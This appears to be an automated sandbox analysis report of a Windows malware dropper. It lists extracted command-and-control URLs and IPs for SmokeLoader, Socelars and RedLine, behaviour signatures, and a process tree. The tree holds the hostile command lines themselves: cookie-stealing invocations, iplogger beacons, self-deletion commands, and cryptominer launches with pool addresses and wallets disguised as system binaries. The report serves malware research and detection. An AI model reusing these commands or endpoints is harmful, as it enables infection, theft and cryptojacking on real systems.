Analysis
-
max time kernel
97s -
max time network
161s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
10-03-2022 01:04
General
-
Target
7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe
-
Size
4.2MB
-
MD5
e2138394ca78efa23b9f0cdd9677be1b
-
SHA1
592ad509f071682a32949a30c6c5121cea6b071e
-
SHA256
7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589
-
SHA512
1121fb5ae305cb0930db7c7beb312bb831fbe8f29966fde851c422766a9eafde4209f32a7df17e5bb87a8690b9e78b9a9f75fe6133e67835a381fa2310098266
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.wygexde.xyz/
Extracted
smokeloader
2020
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/
Extracted
redline
dadad123
86.107.197.196:63065
-
auth_value
dd4834614a3ac04a7b90791c224626a2
Signatures
-
DcRat 12 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Process spawned unexpected child process 9 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 11 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
suricata: ET MALWARE DCRAT Activity (GET)
suricata: ET MALWARE DCRAT Activity (GET)
-
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
OnlyLogger Payload 4 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 42 IoCs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 25 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 11 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
-
Drops file in Program Files directory 9 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 28 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 5 IoCs
-
Kills process with taskkill 3 IoCs
-
Modifies registry class 4 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 13 IoCs
-
Suspicious use of SendNotifyMessage 6 IoCs
-
Suspicious use of SetWindowsHookEx 27 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe"C:\Users\Admin\AppData\Local\Temp\7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe"1⤵
- DcRat
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Rxji73⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe639246f8,0x7ffe63924708,0x7ffe639247184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,8395511421460651168,13690578033526522605,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,8395511421460651168,13690578033526522605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 6203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 6283⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 7443⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 8043⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 8283⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 10363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 10763⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 12443⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 6643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 10403⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij72⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffe639246f8,0x7ffe63924708,0x7ffe639247183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4020 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5740 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2124 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6412 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1c4,0x22c,0x7ff644795460,0x7ff644795470,0x7ff6447954804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6412 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1868 /prefetch:23⤵
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Installation.exe"C:\Users\Admin\AppData\Local\Temp\Installation.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\pzyh.exe"C:\Users\Admin\AppData\Local\Temp\pzyh.exe"2⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\Infos.exe"C:\Users\Admin\AppData\Local\Temp\Infos.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\PWhSdaGNWZZnS8BjtCCZ9pOe.exe"C:\Users\Admin\Documents\PWhSdaGNWZZnS8BjtCCZ9pOe.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\IDgzLzkXcK21aBlMOtzETzcZ.exe"C:\Users\Admin\Documents\IDgzLzkXcK21aBlMOtzETzcZ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 4604⤵
- Program crash
-
C:\Users\Admin\Documents\zIlVU7ZogqbWpTqmVJGYv0Hh.exe"C:\Users\Admin\Documents\zIlVU7ZogqbWpTqmVJGYv0Hh.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4940 -s 4724⤵
- Program crash
-
C:\Users\Admin\Documents\apIafuakphKdmwhIYaWc_mP4.exe"C:\Users\Admin\Documents\apIafuakphKdmwhIYaWc_mP4.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\odt\gtGhkMGggyQ8QkD_Z3jVqai0.exe"C:\odt\gtGhkMGggyQ8QkD_Z3jVqai0.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\LJJlylsdlerbUUgUBlj_im4E.exe"C:\Users\Admin\Documents\LJJlylsdlerbUUgUBlj_im4E.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\Ei8DrAmaYu9K8ghN89Cs.exe"C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\Ei8DrAmaYu9K8ghN89Cs.exe"4⤵
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool wss://eu1.stratum.ton-pool.com/stratum --user UQBoMIYmX6zYTKyRLaph1PjCMfxSLWTbiAw_qqTHLnbMhzWF5⤵
-
C:\Windows\notepad.exeC:\Windows\notepad.exe --coin=XMR -o xmr-eu1.nanopool.org:14444 -u 44W9eLcymm66Eie5AyD11jYW1DaJ4GTHzZEu1QELPGS3U9vKtWEyUCaCFwhn4af8zjeQ2MWeuLgCVDTjAjiGUbyYAtQBvC1 -p 10k instllov5⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5196 -s 4406⤵
- Program crash
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "new" "ton"5⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1372 -s 2686⤵
- Program crash
-
C:\Users\Admin\Documents\VFoNhG_Zeh0WXQxnBSFaZqAE.exe"C:\Users\Admin\Documents\VFoNhG_Zeh0WXQxnBSFaZqAE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 4604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 4684⤵
- Program crash
-
C:\Users\Admin\Documents\e8ds_0qOcrUahz4Yjq0aLvxh.exe"C:\Users\Admin\Documents\e8ds_0qOcrUahz4Yjq0aLvxh.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\1eb3a752-4420-4367-bdec-0407d20e9dc0.exe"C:\Users\Admin\AppData\Local\Temp\1eb3a752-4420-4367-bdec-0407d20e9dc0.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\j9JoI22bTxWmSEp1Dm9hS1RV.exe"C:\Users\Admin\Documents\j9JoI22bTxWmSEp1Dm9hS1RV.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\j9JoI22bTxWmSEp1Dm9hS1RV.exe4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 05⤵
-
C:\Users\Admin\Documents\6WoEM1C6fgCRhgUAcZHi2POU.exe"C:\Users\Admin\Documents\6WoEM1C6fgCRhgUAcZHi2POU.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 6244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 6324⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 6684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 6484⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 7884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 12724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 12804⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "6WoEM1C6fgCRhgUAcZHi2POU.exe" /f & erase "C:\Users\Admin\Documents\6WoEM1C6fgCRhgUAcZHi2POU.exe" & exit4⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "6WoEM1C6fgCRhgUAcZHi2POU.exe" /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 13884⤵
- Program crash
-
C:\Users\Admin\Documents\gtGhkMGggyQ8QkD_Z3jVqai0.exe"C:\Users\Admin\Documents\gtGhkMGggyQ8QkD_Z3jVqai0.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Wsctpfnlhslasrsaigeprim.exe"C:\Users\Admin\AppData\Local\Temp\Wsctpfnlhslasrsaigeprim.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe4⤵
-
C:\Users\Admin\Documents\3pobJdeTncHRVAMa5wc46se6.exe"C:\Users\Admin\Documents\3pobJdeTncHRVAMa5wc46se6.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\BDJG9.exe"C:\Users\Admin\AppData\Local\Temp\BDJG9.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7EEH0.exe"C:\Users\Admin\AppData\Local\Temp\7EEH0.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7I4LD.exe"C:\Users\Admin\AppData\Local\Temp\7I4LD.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\9KGM4.exe"C:\Users\Admin\AppData\Local\Temp\9KGM4.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\76G9I.exe"C:\Users\Admin\AppData\Local\Temp\76G9I.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",5⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",6⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",8⤵
-
C:\Users\Admin\AppData\Local\Temp\76G9IJMD201BBH1.exehttps://iplogger.org/1nChi74⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
